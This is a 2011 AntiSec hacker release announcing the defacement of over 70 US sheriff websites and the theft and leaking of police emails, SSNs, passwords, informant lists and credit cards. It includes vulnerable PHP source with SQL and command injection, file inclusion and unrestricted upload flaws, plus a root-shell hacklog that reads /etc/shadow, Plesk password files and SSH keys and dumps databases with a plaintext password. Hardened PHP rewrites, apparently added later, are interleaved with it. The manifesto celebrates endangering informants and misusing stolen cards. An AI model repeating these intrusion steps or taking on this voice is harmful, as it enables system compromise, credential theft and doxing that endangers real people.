- "Alright Dirty, yall boys ready? Bout to turn drive-bys revolutionary"
- ////////////////////////////////////////////////////////////////////////////////
- ## #FREETOPIARY #FREEMERCEDES #FREEBRADLEYMANNING #SHOOTINNGSHERIFFSSATURDAY ###
- ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ##
- ////////////////////////////////////////////////////////////////////////////////
- _ _ __ .__
- __| || |__ _____ _____/ |_|__| ______ ____ ____ #anonymous
- \ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #antisec
- | || | / __ \| | \ | | |\___ \\ ___/\ \___ #lulzsec
- /_ ~~ _\ (____ /___| /__| |__/____ >\___ >\___ > #freetopiary
- |_||_| \/ \/ \/ \/ \/ #SSS
- ////////////////////////////////////////////////////////////////////////////////
- ANTISEC DELIVERS OVER 10GB OF PRIVATE POLICE EMAILS, TRAINING FILES, SNITCH INFO
- AND PERSONAL INFO IN RETALIATION FOR ANONYMOUS ARRESTS #ShootingSheriffsSaturday
- ////////////////////////////////////////////////////////////////////////////////
- "Missouri Sheriff's Association Executive Director Mick Covington tells KHQA
- that the most the hackers got from their organization were email addresses.
- Contrary to AntiSec's announcement, there were no critical details like names,
- social security numbers or other personal information details on their server
- that was hacked." (DOX AND EMAILS DROPPED)
- (http://www.connecttristates.com/news/story.aspx?id=646614)
- "Based upon past releases of information, the content of these releases are
- sometimes manipulated and edited in an attempt of embarrass or discredit
- government agencies and law enforcement. Also in their release, they threaten to
- publish the names of inmates and confidential informants. Informant and other
- sensitive data are not kept on the website, and we believe any information that
- would be released would be false in an attempt to hinder future investigations
- by law enforcement." - Sheriff John Montgomery (MORE DOX DROPPED)
- (http://www.baxterbulletin.com/article/20110801/NEWS01/110801001/BC-Sheriff-
- Website-hacked?odyssey=tab|topnews|text|FRONTPAGE)
- "President of the Missouri Sheriff's Association Steve Cox said he thinks the
- hackers claim to have more information than they really do. Cox said the group
- just wants glory and fame." (DOX AND SSN DROPPED)
- (http://www.komu.com/news/update-group-hacks-missouri-sheriff-s-association/)
- "Sheriff Joe Guy says, "We've not lost any information. There's no, we've not
- been hacked. I think that's been a fear. No sensitive information is on that
- website anyway." (DOX AND EMAILS DROPPED AGAIN)
- http://wdef.com/news/mcminn_county_sheriffs_department_website/08/2011
- ////////////////////////////////////////////////////////////////////////////////
- A week after we defaced and destroyed the websites of over 70 law enforcement
- agencies, we are releasing a massive amount of confidential information that is
- sure to embarrass, discredit and incriminate police officers across the US. Over
- 10GB of information was leaked including hundreds of private email spools,
- password information, address and social security numbers, credit card numbers,
- snitch information, training files, and more. We hope that not only will
- dropping this info demonstrate the inherently corrupt nature of law enforcement
- using their own words, as well as result in possible humiliation, firings, and
- possible charges against several officers, but that it will also disrupt and
- sabotage their ability to communicate and terrorize communities.
- We are doing this in solidarity with Topiary and the Anonymous PayPal LOIC
- defendants as well as all other political prisoners who are facing the gun of
- the crooked court system. We stand in support of all those who struggle against
- the injustices of the state and capitalism using whatever tactics are most
- effective, even if that means breaking their laws in order to expose their
- corruption. You may bust a few of us, but we greatly outnumber you, and you can
- never stop us from continuing to destroy your systems and leak your data.
- We have no sympathy for any of the officers or informants who may be endangered
- by the release of their personal information. For too long they have been using
- and abusing our personal information, spying on us, arresting us, beating us,
- and thinking that they can get away with oppressing us in secrecy. Well it's
- retribution time: we want them to experience just a taste of the kind of misery
- and suffering they inflict upon us on an everyday basis. Let this serve as a
- warning to would-be snitches and pigs that your leaders can no longer protect
- you: give up and turn on your masters now before it's too late.
- // A TALE OF TWO OWNINGS
- It took less than 24 hours to root BJM's server and copy all their data to our
- private servers. Soon after, their servers were taken down and a news article
- came out suggesting they received advance FBI "credible threat" notice of a
- "hacking plot". At this point it was too late for them because the stolen files
- were gonna get leaked regardless. However we were surprised and delighted to see
- that not only did they relaunch a few sites less than a week later, but that
- their "bigger, faster server that offers more security" carried over our
- backdoors from their original box. This time we were not going to hesitate to
- pull the trigger: in less than an hour we rooted their new server and defaced
- all 70+ domains while their root user was still logged in and active.
- We lol'd as we watched the news reports come in, quoting various Sheriffs who
- denied that they were ever hacked, that any personal information was stolen,
- that they did not store snitch info on their servers. Many lulz have been had as
- we taunted the sheriffs by responding to their denials by tweeting teasers
- exposing their SSNs, passwords, addresses, and private emails. We also took the
- liberty to backdoor their online store and capture a few credit card numbers,
- which were used to make involuntary donations to the ACLU, the EFF, the Bradley
- Manning Support Network, and more. Despite active FBI investigations and their
- additional security measures, they could not stop us from owning their servers,
- stealing their identities, and dropping all their data. Two weeks later only a
- few of the sites are up with limited functionality as we scared them into
- removing any dynamic PHP scripts, forcing them to use static HTML content.
- A recent DHS bulletin has called us "script kiddies" that lack "any capability
- to inflict damage to critical infrastructure" yet we continue to get in and out
- of any system we please, destroying and dropping dox on the mightiest of
- government systems that are supposed to be protecting their sick nightmare of
- "law and order". GIVE UP. You are losing the cyberwar, and the attacks against
- the governments, militaries, and corporations of the world will continue to
- escalate.
- Hackers, join us to make 2011 the year of leaks and revolutions.
- ////////////////////////////////////////////////////////////////////////////////
- [*] ORIGINAL DEFACEMENT: http://zone-h.org/mirror/id/14515221)
- [*] BROWSE THE LEAK: http://vv7pabmmyr2vnflf.onion/ (ON TOR)
- http://vv7pabmmyr2vnflf.tor2web.com/ (NOT TOR)
- [*] DONATE BITCOINS: 18NHixaoQekQJ3y52aBGJJwgBWX9X3myYR
- The booty contains:
- [*] Over 300 mail accounts from 56 law enforcement domains
- [*] Missouri Sheriff account dump (mosheriffs.com)
- 7000+ usernames, passwords, home addresses, phones and SSNs
- [*] Online Police Training Academy files
- PDFs, videos, HTML files
- [*] "Report a Crime" snitch list compilation (60+ entries)
- [*] Plesk plaintext server passwords (ftp/ssh, email, cpanel, protected dirs)
- ////////////////////////////////////////////////////////////////////////////////
- Over 70 US law enforcement institutions were attacked including:
- ////////////////////////////////////////////////////////////////////////////////
- Stolen Credit Card information from mosheriffs.com online store:
- ////////////////////////////////////////////////////////////////////////////////
- For the Blackhat & DEFCON conferences, we figure yall should hear it straight
- from some real black hats. It's time to bust out the old school hacklog and mock
- how vulnerable and insecure our enemies in blue really are.
- ////////////////////////////////////////////////////////////////////////////////
- ////////////////////////////////////////////////////////////////////////////////
- // CONNECT.PHP
- // SAFE_QUERY()... WAY TO MAKE SQL INJECTIONS WORSE BY NOT VALIDATING INPUT ...
- // BUT INSTEAD PASSING RAW INPUT TO SHELL_EXEC() ALLOWING COMMAND EXECUTION !!!
- ////////////////////////////////////////////////////////////////////////////////
- <?
- $i = 0;
- $path = '';
- while(!is_file($path."admin/config/classes/dymin_main.php")){
- $path .= '../';
- $i++;
- if($i>10){
- $path = '';
- break;
- }
- }
- include($path."admin/config/dymin_config.php");
- function safe_query($query){
- if(strpos(getcwd(),'admin')){
- shell_exec("echo '".date("Y-m-d H:i:s")."|".$query."' >> /var/sql_logs/".str_replace("www.","",$_SERVER['HTTP_HOST'].""));
- }
- $database = DATABASE;
- $username = DATABASE_USER;
- $password = DATABASE_PASS;
- $destination = DATABASE_HOST;
- mysql_connect($destination, $username, $password) or die("<br>Unable to connect to database: <br>". mysql_error());
- mysql_select_db($database) or die ("<br> Unable to select database[$database]: <br>" . mysql_error());
- $result = mysql_query($query);
- return $result;
- }
- ?>
- ////////////////////////////////////////////////////////////////////////////////
- // VERIFY_LOGIN.PHP
- // ITS BEEN A HOT MINUTE SINCE I'VE SEEN ' OR 'a'='a SQL INJECTIONS WORK
- // BUT BJM NEVER FAILS TO DELIVER THE MOST OBVIOUS OF VULNERABILITIES
- ////////////////////////////////////////////////////////////////////////////////
- <?php
- session_start();
- $username = $_GET['username'];
- $password = $_GET['password'];
- include "../config/connect.php";
- sleep(2);
- $query = "select * from dymin_user where username = '$username' and password = '$password'";
- $result = safe_query($query);
- $num = mysql_num_rows($result);
- if($num == ''){
- echo "<img src=\"images/login_deny.gif\">";
- }else{
- $id = mysql_result($result,0,'id');
- $level = mysql_result($result,0,'level');
- $_SESSION['user_id'] = $id;
- $_SESSION['username'] = $username;
- $_SESSION['password'] = $password;
- $_SESSION['level'] = $level;
- }
- ?>
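A hardened counterpart to the two scripts above (the shell_exec() query logger and the string-built login query), as an added example that is not code from the original paste or from BJM. It assumes the pdo_sqlite extension, uses an in-memory SQLite table as a stand-in for the MySQL `dymin_user` table so it runs on its own, and assumes a `password_hash` column that the original schema does not show; the account and log path are constructed.

```php
<?php
declare(strict_types=1);

// Added example. SQLite in memory stands in for MySQL; the password_hash
// column is an assumed schema change, and the account below is constructed.
function demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE dymin_user (id INTEGER PRIMARY KEY, username TEXT UNIQUE, '
        . 'password_hash TEXT NOT NULL, level INTEGER NOT NULL)');
    $ins = $pdo->prepare('INSERT INTO dymin_user (username, password_hash, level) VALUES (?, ?, ?)');
    $ins->execute(['webadmin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT), 9]);
    return $pdo;
}

// Stands in for the shell_exec("echo ... >> /var/sql_logs/<HTTP_HOST>") logger:
// no shell, a fixed log path instead of one built from the Host header, and
// only the statement template is written, never the submitted values.
function audit_log(string $logFile, string $sqlTemplate): void
{
    $clean = preg_replace('/[\x00-\x1F\x7F]+/', ' ', $sqlTemplate);
    file_put_contents($logFile, date('Y-m-d H:i:s') . '|' . $clean . "\n", FILE_APPEND | LOCK_EX);
}

// Returns ['id' => int, 'level' => int] on success, null on any failure.
function verify_login(PDO $pdo, string $username, string $password, string $logFile): ?array
{
    static $dummyHash = null;
    if ($dummyHash === null) {
        $dummyHash = password_hash('unused', PASSWORD_DEFAULT);
    }
    $sql = 'SELECT id, password_hash, level FROM dymin_user WHERE username = :u';
    audit_log($logFile, $sql);

    $stmt = $pdo->prepare($sql);            // input is bound, never concatenated
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a dummy hash for unknown users so both paths cost the same.
    $hash = is_array($row) ? $row['password_hash'] : $dummyHash;
    if (!password_verify($password, $hash) || !is_array($row)) {
        return null;
    }
    return ['id' => (int) $row['id'], 'level' => (int) $row['level']];
}

// In the web handler: read credentials from $_POST (not $_GET, which ends up in
// access logs), call session_regenerate_id(true) after success, and store only
// id, username and level in $_SESSION, never the password.
$pdo = demo_db();
$log = sys_get_temp_dir() . '/sql_audit_demo.log';
$attempts = [
    ['webadmin', 'constructed-sample-pw'],   // valid constructed credentials
    ["' OR 'a'='a", "' OR 'a'='a"],          // the string quoted in the paste
    ['webadmin', "x' OR 'a'='a"],            // same string in the password field only
];
foreach ($attempts as [$u, $p]) {
    $result = verify_login($pdo, $u, $p, $log);
    printf("%-16s %s\n", $u, $result === null ? 'denied' : 'ok, level ' . $result['level']);
}
```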
- ////////////////////////////////////////////////////////////////////////////////
- // RENAME_FILE.PHP
- // PASSING RAW USER-SUPPLIED INPUT TO RENAME AND INCLUDE FUNCTIONS ...
- // TWO VULNERABILITIES FOR THE PRICE OF ONE!!
- ////////////////////////////////////////////////////////////////////////////////
- <?
- error_reporting(E_ALL);
- ini_set('display_errors', '1');
- include "../../admin/config/connect.php";
- $filename = $_POST['name'];
- $type = $_POST['type'];
- $uploads_dir_path_with_date = '../../uploads/'.date("Ymd").'/';
- $uploads_dir_path = '../../uploads/'.date("Ymd").'/';
- $uploads_dir_path_no_date = '../../uploads/';
- if(!is_file($uploads_dir_path_no_date.'log.txt')){
- $fh = fopen("$uploads_dir_path_no_date"."log.txt",'w');
- shell_exec("chmod 777 $uploads_dir_path_with_date"."log.txt");
- fclose($fh);
- }
- if(!is_dir($uploads_dir_path_with_date)){
- mkdir($uploads_dir_path_with_date,'0777');
- shell_exec("chmod 777 $uploads_dir_path_with_date");
- }
- $id = $_GET['id'];
- $new_name = md5(microtime().$filename.mt_rand(10000, 32000));
- rename("$uploads_dir_path_no_date$filename","$uploads_dir_path_with_date$new_name$type");
- //write file upload log
- $fh = fopen("$uploads_dir_path_no_date"."log.txt",'a');
- $log_info = 'DATE: '.date("m-d-Y His")."\t";
- $log_info .= 'HTTP_HOST: '.$_SERVER['HTTP_HOST']."\t";
- $log_info .= 'REMOTE_ADDR: '.$_SERVER['REMOTE_ADDR']."\t";
- $log_info .= 'SCRIPT_FILENAME: '.$_SERVER['SCRIPT_FILENAME']."\t";
- $log_info .= 'OLD_FILENAME: '.$filename."\t";
- $log_info .= 'NEW_FILENAME: '.$new_name."\t\n";
- fwrite($fh,$log_info);
- fclose($fh);
- unset($fh,$log_info);
- $file_to_include = $_GET['filename'];
- include "$file_to_include";
- ?>
- ////////////////////////////////////////////////////////////////////////////////
- // UPLOADIFY.PHP
- // WAY TO GO, COMMENTING OUT THE FILE EXTENSION VALIDATING CODE
- ////////////////////////////////////////////////////////////////////////////////
- <?php
- if (!empty($_FILES)) {
- $tempFile = $_FILES['Filedata']['tmp_name'];
- $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
- $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
- // $fileTypes = str_replace('*.','',$_REQUEST['fileext']);
- // $fileTypes = str_replace(';','|',$fileTypes);
- // $typesArray = split('\|',$fileTypes);
- // $fileParts = pathinfo($_FILES['Filedata']['name']);
- // if (in_array($fileParts['extension'],$typesArray)) {
- // Uncomment the following line if you want to make the directory if it doesn't exist
- // mkdir(str_replace('//','/',$targetPath), 0755, true);
- move_uploaded_file($tempFile,$targetFile);
- echo "1";
- // } else {
- // echo 'Invalid file type.';
- // }
- }
- ?>
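What the upload handler above looks like with the extension check restored and the destination taken out of the client's hands, as an added example that is not the Uploadify or BJM code. The image-only allow-list, the function names and the sample files are assumptions; it needs the fileinfo extension.

```php
<?php
declare(strict_types=1);

// Added example. Extension => expected MIME type; this allow-list is an
// assumption for an image-only upload feature.
const ALLOWED_UPLOADS = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

// Returns the vetted extension, or null if the file must be rejected.
function vet_upload(string $tmpPath, string $clientName): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_UPLOADS[$ext])) {
        return null;                                   // .php, .phtml, no extension, ...
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    return $mime === ALLOWED_UPLOADS[$ext] ? $ext : null;   // content must match extension
}

// Final path: server-chosen directory plus a random name. Neither
// $_REQUEST['folder'] nor the client's file name reaches the file system.
function storage_path(string $uploadDir, string $ext): string
{
    return rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
}

// Web entry point: pass $_FILES['Filedata'] and a fixed directory from config.
function handle_upload(array $file, string $uploadDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = vet_upload($file['tmp_name'], $file['name']);
    if ($ext === null) {
        return null;
    }
    $dest = storage_path($uploadDir, $ext);
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

// Demo on constructed files. is_uploaded_file() only accepts real HTTP uploads,
// so the demo exercises vet_upload() directly.
$tmp = sys_get_temp_dir() . '/upload_demo_' . bin2hex(random_bytes(4));
mkdir($tmp, 0700);
file_put_contents("$tmp/a", 'GIF89a' . pack('v2', 1, 1) . "\x00\x00\x00;");   // minimal GIF header
file_put_contents("$tmp/b", "<?php echo 'constructed placeholder'; ?>");
$cases = [
    ['a', 'mugshot.gif'],   // image content, image extension
    ['a', 'MUGSHOT.GIF'],   // extension compared case-insensitively
    ['b', 'tool.php'],      // script extension
    ['b', 'mugshot.gif'],   // script content behind an image extension
];
foreach ($cases as [$file, $name]) {
    $ext = vet_upload("$tmp/$file", $name);
    printf("%-12s %s\n", $name, $ext === null ? 'rejected' : 'accepted as .' . $ext);
}
```

MIME sniffing alone is not a guarantee; the forced extension, the random server-side name and a web-server rule that disables script handling in the upload directory are what keep a stored file from executing.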
- ////////////////////////////////////////////////////////////////////////////////
- // SHOW_IMAGE_DOWNLOAD.PHP
- // HEY LETS TAKE RAW USER INPUT AND PASS IT TO READFILE() ...
- // AT LEAST THEY HAD THE COURTESY OF VERIFYING IS_FILE() FOR US!!!
- ////////////////////////////////////////////////////////////////////////////////
- <? include "config/header.php"; ?>
- <?php
- $filename = $_GET['filename'];
- if(is_file($filename)) {
- header("Pragma: public");
- header("Expires: 0");
- header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
- header("Content-Type: application/force-download");
- header("Content-Type: application/octet-stream");
- header("Content-Type: application/download");
- header("Content-Disposition: attachment; filename=".basename($filename).";");
- header("Content-Transfer-Encoding: binary");
- header("Content-Length: ".filesize($filename));
- readfile("$filename");
- exit();
- }
- ?>
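Both the `include "$file_to_include"` in rename_file.php and the `readfile("$filename")` above hand a request parameter straight to the file system. The following added example, which is not code from the paste or from BJM, shows the confinement check that is missing; the directory layout, file names and the `page_for()` key map are constructed for the demo.

```php
<?php
declare(strict_types=1);

// Added example. Directory and file names below are constructed.

// Resolve a user-supplied name to a real file strictly below $baseDir, or null.
function resolve_inside(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    // realpath() collapses ../ and follows symlinks, so the prefix test below
    // is made on the file that would actually be opened.
    $real = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Trailing separator so that /srv/uploads-old never matches /srv/uploads.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// include must never take a path from the request: map a key to a fixed file.
function page_for(string $key, array $pages): ?string
{
    return $pages[$key] ?? null;
}

// Call only with a path returned by resolve_inside().
function send_download(string $realPath): void
{
    // Keep the header value to a conservative character set.
    $name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($realPath));
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('Content-Length: ' . filesize($realPath));
    header('X-Content-Type-Options: nosniff');
    readfile($realPath);
}

// Demo on a constructed directory tree.
$root = sys_get_temp_dir() . '/dl_demo_' . bin2hex(random_bytes(4));
mkdir("$root/uploads", 0700, true);
file_put_contents("$root/uploads/wanted_poster.jpg", 'constructed sample');
file_put_contents("$root/site_config.php", 'constructed stand-in for a config file');

$inputs = ['wanted_poster.jpg', '../site_config.php', "$root/site_config.php"];
foreach ($inputs as $in) {
    $real = resolve_inside("$root/uploads", $in);
    printf("%-60s %s\n", $in, $real === null ? 'rejected' : 'served from ' . $real);
}

$pages = ['upload_done' => __DIR__ . '/views/upload_done.php'];   // hypothetical view file
$view = page_for('../../admin/config/connect.php', $pages);
printf("%-60s %s\n", 'include key not in the map', $view === null ? 'rejected' : $view);
```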
- ////////////////////////////////////////////////////////////////////////////////
- // UPLOAD_SCANNER.SH
- // UH OH... THEY ARE CLOSING IN ON OUR C99 SHELL!!! PLEASE...
- ////////////////////////////////////////////////////////////////////////////////
- #!/bin/bash
- #
- # Scan for PHP in upload folders
- #
- MAILTO="-c galexander@bjmweb.com -c markm@bjmweb.com -c bnewman@bjmweb.com root"
- EXCLUDES="-e watermark_wanted_photo.php -e checkimages.php -e watermark_recalled_photo.php"
- lineify (){
- for i in $*
- do
- echo $i
- done
- }
- # testing
- #EXCLUDES="numnum"
- #MAILTO="jwiegand@bjmweb.com"
- #
- UHOH=$(/usr/bin/find /var/www/vhosts/*/httpdocs/uploads/*.php | \
- grep -v $EXCLUDES)
- if [ "${UHOH}xx" != "xx" ]
- then
- lineify $UHOH | mail -s "Go Daddy - Upload Scanner" $MAILTO
- fi
- ////////////////////////////////////////////////////////////////////////////////
- // ENOUGH TALK... TIME TO RIDE ON THESE PIG MOTHAFUCKAS !!! BRING ON THE HACKLOG
- ////////////////////////////////////////////////////////////////////////////////
- $ ls -al /var/www/vhosts/
- // DAMN THATS A LOT OF DOMAINS... TOO BAD ZONE-H MASS DEFACEMENT NOTIFICATION
- // FORM ONLY ALLOWS YOU TO SUBMIT 10 PER REQUEST... GONNA TAKE FOREVER
- $ cat /etc/passwd
- sfcgar:x:10093:2522::/var/www/vhosts/stfranciscountyar.org:/bin/false
- lcsomo:x:10094:2522::/var/www/vhosts/lcsdmo.com:/bin/false
- tcsoal:x:10095:2522::/var/www/vhosts/talladegasheriff.org:/bin/false
- jwiegand:x:10096:10096::/home/jwiegand:/bin/bash
- bcsf:x:10097:2522::/var/www/vhosts/baxtercountysherifffoundation.org:/bin/false
- prsoms:x:10089:2522::/var/www/vhosts/prentisscountymssheriff.com:/bin/false
- acsoms:x:10098:2522::/var/www/vhosts/adamscosheriff.org:/bin/false
- kssa:x:10099:2522::/var/www/vhosts/kansassheriffs.org:/bin/false
- // CAT'N HUNDREDS OF .HTPASSWD FILES IN ONE COMMAND LIKE A BOSS
- $ cat /var/www/vhosts/*/pd/*
- // LETS SEE WHAT KINDA SHIT THEY RUNNIN
- $ ps -aux
- // TIME TO GET STREET ON THESE PIGS
- $ ./a.black.hat.never.kisses.and.tells
- # id
- uid=0(root) gid=0(root) groups=48(apache),2521(psaserv)
- // CRACKING SHADOW FILES ARE LESS FUN WHEN PLESK STORES USER, FTP AND EMAIL
- // PASSES IN PLAINTEXT IN FILES AND MYSQL PSA TABLES
- # cat /etc/psa/.psa.shadow
- # cat /etc/shadow
- // YOU KNOW WHAT IT IS, ITS A STICKUP
- # ls -al ~root
- total 420776
- drwxr-x--- 17 root root 4096 Jul 22 11:37 .
- drwxr-xr-x 26 root root 4096 Feb 22 22:21 ..
- drwxr-xr-x 2 root root 4096 Nov 30 2010 .autoinstaller
- -rw------- 1 root root 19127 Jul 21 15:58 .bash_history
- -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
- -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
- -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
- -rw-r--r-- 1 root root 121 Sep 2 2010 .cshrc
- -rw-r--r-- 1 root root 9 Feb 10 10:28 .exrc
- -rw------- 1 root root 686 Jul 20 13:03 .lesshst
- -rw------- 1 root root 1739 Jul 20 10:29 .mysql_history
- -rw-r--r-- 1 root root 91 Dec 23 2009 .pearrc
- -rw------- 1 root root 1024 May 3 09:00 .rnd
- drwx------ 2 root root 4096 Mar 12 2010 .spamassassin
- drwx------ 2 root root 4096 Jan 25 13:27 .ssh
- -rw------- 1 root root 276 Jul 20 10:44 .support_history
- -rw-r--r-- 1 root root 150 Sep 2 2010 .tcshrc
- -rw-r--r-- 1 root root 1143587 Jul 22 11:50 BOCS_warrant_query.sql
- -rw-r--r-- 1 root root 187976 Jul 22 11:45 CRCSD_warrant_query.sql
- -rw-r--r-- 1 root root 3543 Feb 23 09:42 Chicago
- drwxrwxrwx 17 20 games 4096 Dec 30 2009 ImageMagick-6.4.8-3
- -rw-r--r-- 1 root root 11148165 Apr 9 2009 ImageMagick-6.4.8-3.tar.gz
- drwxr-xr-x 2 root root 4096 Jul 14 15:15 MASS_PASS
- -rw-r--r-- 1 root root 94158 Dec 13 2010 MCSOAL.search
- -rw-r--r-- 1 root root 1501473 Jul 22 11:48 SFSOAR_warrant_query.sql
- -rw------- 1 root root 742 Feb 4 2008 anaconda-ks.cfg
- drwxr-xr-x 2 root root 4096 Jun 21 15:31 bin
- drwxr-xr-x 2 root root 4096 May 3 09:53 cert
- -rw-r--r-- 1 root root 1898 May 3 09:09 csr.txt
- drwxr-xr-x 3 root root 4096 Sep 20 2010 downloads
- -rw-r--r-- 1 bocg psacln 0 Jun 21 14:23 huh
- -rw-r--r-- 1 root root 1177 Mar 24 08:50 injection_patch.php
- -rw-r--r-- 1 root root 1182 Mar 24 08:50 injection_patch.php.bak
- -rw-r--r-- 1 root root 13552 Feb 4 2008 install.log
- -rw-r--r-- 1 root root 2540 Feb 4 2008 install.log.syslog
- -rwxrwxrwx 1 mosa psacln 803 Mar 24 2010 log.php
- -rw------- 1 root root 1733 Nov 30 2010 mbox
- -rw-r--r-- 1 root root 93 Aug 23 2010 md5look.php
- -rw-r--r-- 1 root root 36773929 Jul 21 22:04 mysql_backup.sql.gz
- -rw-r--r-- 1 root root 133498898 Jul 1 08:17
- mysql_dump_20110701-081158.sql.gz
- -rw-r--r-- 1 root root 144511936 Jul 8 10:59
- mysql_dump_20110708-104506.sql.gz
- -rw-r--r-- 1 root root 37564532 Jul 15 06:04
- mysql_dump_20110715-060000.sql.gz
- -rw-r--r-- 1 root root 38461089 Jul 22 11:18
- mysql_dump_20110722-111716.sql.gz
- drwxr-xr-x 2 root root 4096 Jun 20 09:46 p7zip
- -rwxrwxrwx 1 mosa psacln 475 Mar 24 2010 parse_geocodes.php
- -rw-r--r-- 1 root root 7164 Jul 5 14:20 perms.log
- drwxr-xr-x 14 1002 1002 4096 Aug 23 2006 php-5.1.6
- -rw-r--r-- 1 root root 8187896 Aug 23 2006 php-5.1.6.tar.gz
- -rw-r--r-- 1 root root 21 Apr 22 10:16 phpinfo.php
- drwxr-xr-x 9 root root 4096 Jul 21 16:24 psa
- drwxrwxr-x 2 510 510 4096 Jun 3 2010 qmhandle-1.3.2
- -rw-r--r-- 1 webdept webdept 15423 Apr 12 2010 qmhandle-1.3.2.tar.gz
- -rw-r--r-- 1 root root 4293 Jun 21 17:48 recaptcha.log
- -rw-r--r-- 1 root root 9751 Jun 21 16:04 recaptchalib.php
- -rw-r--r-- 1 root root 9751 Jun 21 16:04 recaptchalib.php.bak
- -rw-r--r-- 1 root root 9747 Jun 21 15:56 recaptchalib.php.bak.bak
- drwxr-xr-x 3 root root 4096 Dec 21 2009 rootkit_checks
- drwxr-xr-x 2 root root 4096 Jul 20 11:01 scripts
- -rw-r--r-- 1 root root 32 Jun 21 14:54 sete.sh
- -rw-r--r-- 1 root root 355812 Jun 21 14:22 tat E
- drwxr-xr-x 6 root root 4096 Jun 21 15:38 tiny_mce
- -rw-r--r-- 1 root root 2231 Jun 21 11:02 tiny_mce.php
- -rw-r--r-- 1 root root 8957 Jun 21 14:50 tinymce.log
- -rw-r--r-- 1 root root 6101 Jun 21 15:10 tinymce_php.log
- -rw-r--r-- 1 root root 1141875 Jun 29 18:20 warrant_query.sql
- -rw-r--r-- 1 root root 15503360 Jul 22 01:32 z
- // FIRST LETS LOOT THIS MOFO
- # mysqldump -q -u admin -p8w667nHzx%XFXb --all-databases --add-drop-table >
- booty.sql
- // GIMME THE KEYS TO YO HOUSE
- # cat ~root/.ssh/*
- // NOW LETS SEE WHAT YOU WORKING WITH
- # cat ~root/scripts/*
- #!/bin/sh
- datex=$(date +'%Y%m%d-%H%M%S')
- file=mysql_dump_$datex.sql.gz
- echo Backup is $file
- PASSWORD=`cat /etc/psa/.psa.shadow`
- mysqldump -q -u admin -p$PASSWORD --all-databases --add-drop-table | gzip >
- ~/$file
- 0,15,30,45 * * * * /usr/local/psa/admin/sbin/backupmng >/dev/null
- 2>&1
- 0 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/secur-check
- 0 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/send-report
- weekly
- 10 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/clean-
- sysstats
- 15 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/pack-
- sysstats day
- 15 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/pack-
- sysstats week
- 15 1 1 * * /usr/local/psa/libexec/modules/watchdog/cp/pack-
- sysstats month
- 15 1 1 * * /usr/local/psa/libexec/modules/watchdog/cp/pack-
- sysstats year
- 20 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/clean-
- events
- 0 3 * * 7 /usr/local/psa/libexec/modules/watchdog/cp/clean-
- reports
- 0 22 * * * /root/scripts/mySQLbackup.sh | mail -s
- "mySQL Backup" test@mostwantedwebsites.net
- 50 23 * * * /usr/bin/rsnapshot daily
- 40 23 * * 6 /usr/bin/rsnapshot weekly
- 0 1 * * * /usr/bin/php
- /var/www/vhosts/baxtercountysheriff.com/httpdocs/admin_dymin/modules/most_wanted
- /config/delete_cron.php
- */5 * * * * /usr/bin/php
- /var/www/vhosts/baxtercountysheriff.com/home/parse_xml.php >/dev/null 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/lawrencecosheriff.com/home/parser.php >/dev/null 2>&1
- #*/5 * * * * /usr/bin/php
- /var/www/vhosts/mostwantedwebsites.net/subdomains/lawmo/httpdocs/home/parser.php
- >/dev/null 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/cherokeecountyalsheriff.com/home/parser.php >/dev/null 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
- /backup/johms_parse_log.txt
- */5 * * * * /usr/bin/php
- /var/www/vhosts/stonecountymosheriff.com/home/parse_roster.php >>
- /backup/stoms_parse_log.txt 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/home/Cross\ County/parse_pcv.php
- >/dev/null 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/boonesheriff.com/home/parse_pcv.php >/dev/null 2>&1
- */16 * * * * /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/home/Cross\ County/warrant_parser.php
- >/dev/null 2>&1
- */15 * * * * /usr/bin/php
- /var/www/vhosts/boonesheriff.com/home/warrant_parser.php >/dev/null 2>&1
- */15 * * * * /usr/bin/php
- /var/www/vhosts/tunicamssheriff.com/httpdocs/RPC/test.php >/dev/null 2>&1
